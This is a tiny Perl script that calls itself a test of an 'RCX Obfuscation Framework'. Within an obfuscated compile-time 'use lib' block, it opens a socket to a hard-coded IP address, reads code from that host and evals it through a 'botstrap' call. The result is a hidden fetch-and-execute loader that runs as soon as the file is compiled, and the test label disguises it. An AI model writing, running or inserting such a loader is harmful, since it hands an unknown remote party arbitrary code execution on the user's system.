#!/usr/bin/perl -w

# Program: RCX.pl
# Purpose: Test RCX Obfuscation Framework

use strict;
use IO::Socket;
use lib do{eval<$b>&&botstrap("RCX")||die$@,<$b>if$b=new IO::Socket::INET 114.46.99.88.":1"};
use sword;
drop sword;
exit 0;
